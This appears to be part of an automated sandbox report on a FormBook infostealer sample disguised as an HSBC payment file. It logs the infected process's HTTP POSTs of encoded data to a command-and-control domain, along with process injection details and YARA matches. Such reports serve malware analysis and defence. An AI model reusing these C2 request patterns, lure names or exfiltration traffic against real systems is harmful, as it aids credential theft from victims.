                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ==
                                                                                                                              set-cookie: parking_session=d9fb7421-c61d-4614-bbd2-7703015ef4a6; expires=Tue, 22 Oct 2024 03:55:42 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 68 50 78 4d 4f 54 4e 4e 39 2b 4c 66 77 4e 43 46 70 2f 70 52 44 33 61 6d 63 48 75 30 34 6b 31 44 36 76 36 31 6b 45 45 47 2b 7a 34 61 41 61 71 7a 63 67 34 4f 58 67 4d 61 57 34 63 53 62 48 72 6f 5a 71 36 4e 75 53 55 61 7a 46 73 37 63 68 71 4d 6e 36 56 6c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Oct 22, 2024 05:40:42.522268057 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDlmYjc0MjEtYzYxZC00NjE0LWJiZDItNzcwMzAxNWVmNGE2IiwicGFnZV90aW1lIjoxNzI5NTY4ND


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.2.650002199.59.243.227805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:44.464335918 CEST704OUTPOST /g3wl/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.donante-de-ovulos.biz
                                                                                                                              Origin: http://www.donante-de-ovulos.biz
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 233
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.donante-de-ovulos.biz/g3wl/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 34 41 67 57 6f 53 67 69 4f 4e 74 36 4f 70 4d 58 30 44 32 69 74 39 52 37 70 75 2f 47 6b 7a 36 6b 63 4e 34 6f 76 62 31 6c 57 73 31 76 78 47 38 63 50 2b 41 65 50 53 4e 6d 39 2b 2b 5a 2b 4e 33 76 79 59 7a 71 41 78 6d 47 73 62 65 39 41 31 58 4f 30 78 59 38 39 78 4a 51 33 4b 68 6d 47 4d 74 50 34 42 41 61 6e 77 37 67 58 4f 30 37 73 50 71 47 51 2f 56 2f 32 66 43 63 6a 35 69 43 72 49 44 4d 55 46 6e 4c 46 4d 45 68 55 4e 79 50 55 67 61 6f 54 37 44 44 30 4e 36 6f 31 6a 59 45 50 56 43 71 48 78 30 51 49 74 78 36 56 35 4d 68 4e 45 72 55 63 65 61 78 6e 6e 38 43 43 54 55 69 39 67 34 75 62 6c 52 41 2b 74 64 64 71 32 38 50 57 36 34 55 42 57 65 79 66 4e 54 33 7a 68 33 37 49 44 36 4d 77 51 3d 3d
                                                                                                                              Data Ascii: kT9p=4AgWoSgiONt6OpMX0D2it9R7pu/Gkz6kcN4ovb1lWs1vxG8cP+AePSNm9++Z+N3vyYzqAxmGsbe9A1XO0xY89xJQ3KhmGMtP4BAanw7gXO07sPqGQ/V/2fCcj5iCrIDMUFnLFMEhUNyPUgaoT7DD0N6o1jYEPVCqHx0QItx6V5MhNErUceaxnn8CCTUi9g4ublRA+tddq28PW64UBWeyfNT3zh37ID6MwQ==
                                                                                                                              Oct 22, 2024 05:40:45.114386082 CEST1236INHTTP/1.1 200 OK
                                                                                                                              date: Tue, 22 Oct 2024 03:40:44 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1154
                                                                                                                              x-request-id: db7d557c-e50d-4033-aaf5-ff545f0367fc
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ==
                                                                                                                              set-cookie: parking_session=db7d557c-e50d-4033-aaf5-ff545f0367fc; expires=Tue, 22 Oct 2024 03:55:45 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 68 50 78 4d 4f 54 4e 4e 39 2b 4c 66 77 4e 43 46 70 2f 70 52 44 33 61 6d 63 48 75 30 34 6b 31 44 36 76 36 31 6b 45 45 47 2b 7a 34 61 41 61 71 7a 63 67 34 4f 58 67 4d 61 57 34 63 53 62 48 72 6f 5a 71 36 4e 75 53 55 61 7a 46 73 37 63 68 71 4d 6e 36 56 6c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Oct 22, 2024 05:40:45.114456892 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGI3ZDU1N2MtZTUwZC00MDMzLWFhZjUtZmY1NDVmMDM2N2ZjIiwicGFnZV90aW1lIjoxNzI5NTY4ND


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              31192.168.2.650003199.59.243.227805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:47.007349014 CEST1717OUTPOST /g3wl/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.donante-de-ovulos.biz
                                                                                                                              Origin: http://www.donante-de-ovulos.biz
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 1245
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.donante-de-ovulos.biz/g3wl/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 34 41 67 57 6f 53 67 69 4f 4e 74 36 4f 70 4d 58 30 44 32 69 74 39 52 37 70 75 2f 47 6b 7a 36 6b 63 4e 34 6f 76 62 31 6c 57 73 39 76 78 31 6b 63 4f 66 41 65 4d 53 4e 6d 68 75 2b 63 2b 4e 32 74 79 59 72 75 41 78 72 35 73 64 43 39 42 51 62 4f 32 44 77 38 33 78 4a 51 36 71 68 6c 65 73 74 67 34 46 73 47 6e 77 72 67 58 4f 30 37 73 4e 79 47 48 36 68 2f 30 66 43 66 71 5a 6a 4e 35 34 44 6b 55 45 43 32 46 4d 41 62 56 39 53 50 55 41 4b 6f 63 75 66 44 73 64 37 4f 32 6a 59 6d 50 56 65 44 48 33 51 63 49 74 74 41 56 34 30 68 64 79 6a 49 47 73 75 4d 6b 6e 63 4e 44 54 41 31 2b 58 67 34 63 32 35 42 31 38 56 42 68 33 39 68 56 73 67 6f 46 67 44 56 49 39 54 58 2f 57 79 34 42 77 57 4a 76 54 62 2f 47 4c 75 62 50 6f 54 52 59 6e 35 2b 74 42 78 70 70 70 52 6d 77 71 70 30 76 6f 44 77 41 52 66 64 4d 6d 4d 34 6d 38 6a 6b 37 43 32 6d 56 78 58 34 6d 67 75 58 5a 31 2b 79 68 63 4a 66 69 56 36 5a 61 71 75 43 4d 31 45 74 39 53 75 42 6d 7a 44 79 47 74 79 6e 46 59 76 7a 47 46 51 4f 42 32 77 62 31 45 41 39 56 73 66 46 43 [TRUNCATED]
                                                                                                                              Data Ascii: kT9p=4AgWoSgiONt6OpMX0D2it9R7pu/Gkz6kcN4ovb1lWs9vx1kcOfAeMSNmhu+c+N2tyYruAxr5sdC9BQbO2Dw83xJQ6qhlestg4FsGnwrgXO07sNyGH6h/0fCfqZjN54DkUEC2FMAbV9SPUAKocufDsd7O2jYmPVeDH3QcIttAV40hdyjIGsuMkncNDTA1+Xg4c25B18VBh39hVsgoFgDVI9TX/Wy4BwWJvTb/GLubPoTRYn5+tBxpppRmwqp0voDwARfdMmM4m8jk7C2mVxX4mguXZ1+yhcJfiV6ZaquCM1Et9SuBmzDyGtynFYvzGFQOB2wb1EA9VsfFCdhUUhqzc0NbQI+xC7BXZmWDsGwgrmFoRNbyyYQsvWHbOqMgIg/m0+1YHibLHSfW/mwTngCaLn5pLf2rKTTOJBEClRH87ih8umG4Xx0d/irlo2522rWSTnVx4xBBsFA7doPXZZQBZUanWAKY6vxCiTaM4jfYEIexc1LP90/tHZT13Kyk4K8A/7DqJ46WqKmEROuTfVGYaDEdo9eDNlIhckClY/7GKGlkE5V0DWRRtctOLf6v8NtuRfSsmfzrvECgxcUhC/nG5fVWXhves+iXmhEs3//iLXBT9RD2rECEFCgdTRpsCOt1QUFbiOVCCg74i3sRIzHc1uJw6lss1WhdCA68erTmbUURLOu4a5RpBLlEfFIoz612YodNF4K4Dxi1CY8iz8L/e6GkFmgOkti74dt5UUFFgzkKUBPadKvq0bZDmyyeZtswe4NMv8/oN9eHB52PR3mu2jVJaOFYbmxl4rYXN+VgZs/EOldxvVA/p1ipHHwqRNmuyJDP9ejal7Czt3FGPPLrLQULq2uvgMsXOh6Wy1euWDpGsCEJCNHMXv7g9+d4G+aDfSTRMyd6zonsw0nBjLcNR1x2m2FeFzQWxpO3p7a6Q+bhX24+Tfea0Ew31LrrrHtKMaXalrb82jj1ZHQbEv9F/GqkfFetuGERLvSvxF8J8LZK8YY [TRUNCATED]
                                                                                                                              Oct 22, 2024 05:40:47.625760078 CEST1236INHTTP/1.1 200 OK
                                                                                                                              date: Tue, 22 Oct 2024 03:40:46 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1154
                                                                                                                              x-request-id: e0c07cae-767a-49c6-973e-a3fed0b92812
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ==
                                                                                                                              set-cookie: parking_session=e0c07cae-767a-49c6-973e-a3fed0b92812; expires=Tue, 22 Oct 2024 03:55:47 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 68 50 78 4d 4f 54 4e 4e 39 2b 4c 66 77 4e 43 46 70 2f 70 52 44 33 61 6d 63 48 75 30 34 6b 31 44 36 76 36 31 6b 45 45 47 2b 7a 34 61 41 61 71 7a 63 67 34 4f 58 67 4d 61 57 34 63 53 62 48 72 6f 5a 71 36 4e 75 53 55 61 7a 46 73 37 63 68 71 4d 6e 36 56 6c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Oct 22, 2024 05:40:47.625823021 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTBjMDdjYWUtNzY3YS00OWM2LTk3M2UtYTNmZWQwYjkyODEyIiwicGFnZV90aW1lIjoxNzI5NTY4ND


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              32192.168.2.650004199.59.243.227805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:49.554302931 CEST415OUTGET /g3wl/?kT9p=1CI2rntFLoR8LORJomanxZlvrsXZ8iOzXp0hteFUX7ZC4CpkEd9LFXVMj4GYlfKx8LXJCAGhhNbTKAnE5hN2yzgMyKEEG9EdyQR/qyvuetkdr/L/NuFg5/mzu6W7tc33QTvsPJE=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.donante-de-ovulos.biz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Oct 22, 2024 05:40:50.204662085 CEST1236INHTTP/1.1 200 OK
                                                                                                                              date: Tue, 22 Oct 2024 03:40:49 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1546
                                                                                                                              x-request-id: 949b0cb5-53ff-409d-ba84-eac38cddbfab
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QcKuSBJ+rx+nhfq32v/J4j91ManMrXLl6IlLlsNRJeNb9G5T1OuyDh5y+MB2TOLELyXo4akBdQ547d+z88Ygjw==
                                                                                                                              set-cookie: parking_session=949b0cb5-53ff-409d-ba84-eac38cddbfab; expires=Tue, 22 Oct 2024 03:55:50 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 63 4b 75 53 42 4a 2b 72 78 2b 6e 68 66 71 33 32 76 2f 4a 34 6a 39 31 4d 61 6e 4d 72 58 4c 6c 36 49 6c 4c 6c 73 4e 52 4a 65 4e 62 39 47 35 54 31 4f 75 79 44 68 35 79 2b 4d 42 32 54 4f 4c 45 4c 79 58 6f 34 61 6b 42 64 51 35 34 37 64 2b 7a 38 38 59 67 6a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QcKuSBJ+rx+nhfq32v/J4j91ManMrXLl6IlLlsNRJeNb9G5T1OuyDh5y+MB2TOLELyXo4akBdQ547d+z88Ygjw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Oct 22, 2024 05:40:50.204727888 CEST999INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTQ5YjBjYjUtNTNmZi00MDlkLWJhODQtZWFjMzhjZGRiZmFiIiwicGFnZV90aW1lIjoxNzI5NTY4ND


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:23:37:52
                                                                                                                              Start date:21/10/2024
                                                                                                                              Path:C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"
                                                                                                                              Imagebase:0x720000
                                                                                                                              File size:1'179'648 bytes
                                                                                                                              MD5 hash:6BA55B78696072EA7F7F56C955FE1C0B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:23:37:53
                                                                                                                              Start date:21/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"
                                                                                                                              Imagebase:0x380000
                                                                                                                              File size:46'504 bytes
                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:23:38:12
                                                                                                                              Start date:21/10/2024
                                                                                                                              Path:C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe"
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:5
                                                                                                                              Start time:23:38:14
                                                                                                                              Start date:21/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\sdchange.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                                                                                                              Imagebase:0x3f0000
                                                                                                                              File size:40'960 bytes
                                                                                                                              MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
